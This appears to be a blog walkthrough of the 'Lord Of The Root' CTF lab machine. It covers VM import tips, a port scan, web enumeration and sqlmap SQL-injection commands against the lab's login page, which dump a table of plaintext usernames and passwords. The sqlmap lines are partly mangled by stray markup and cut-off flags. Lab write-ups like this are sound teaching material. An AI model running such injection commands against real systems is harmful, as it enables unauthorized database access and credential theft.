Load of the Root 1.0.1

Posted Jun 11, 2023 Updated Apr 7, 2024

Load of the Root Machine 👑

By Shivendra Prajapati 1 min read

Description ⤵️

I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP.

This is a boot-to-root machine will not require any guest interaction.

There are two designed methods for privilege escalation.

23/09/2015 == v1.0.1
22/09/2015 == v1.0

If you are having issues with VirtualBox, try the following:

Downloaded LordOfTheRoot_1.0.1.ova (confirmed file hash)
Downloaded and installed VMWare ovftool.
Converted the OVA to OVF using ovftool.
Modified the OVF using text editor, and did the following:
replaced all references to “ElementName” with “Caption” replaced the single reference to “vmware.sata.ahci” with “AHCI”
Saved the OVF. +Deleted the .mf (Manifest) file. If you do not you get an error when importing, saying the SHA does not match for the OVF (I also tried modifying the hash, but no luck).
Try import the OVF file, and it should work fine.

Source: https://twitter.com/dooktwit/status/646840273482330112

Let’s find the IP Address first »

IP : 10.0.2.23

Port Scan Results ➡️

OPEN PORTS >
22   SSH
1337 HTTP

Web Enumeration ⤵️

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

Closer!

Sqlmap →

  
commands →
sqlmap -o -u http**://**10.0.2.23**:**1337**/**978345210**/**index.php --form --dbs --l

  
Command → 
sqlmap -o -u http://10.0.2.23:1337/978345210/index.php --form --dbms m

+----+------------------+----------+

| id | password         | username |

+----+------------------+----------+

| 1  | iwilltakethering | frodo    |

| 2  | MyPreciousR00t   | smeagol  |

| 3  | AndMySword       | aragorn  |

| 4  | AndMyBow         | legolas  |

| 5  | AndMyAxe         | gimli    |

+----+------------------+----------+

Now lets try SSH login →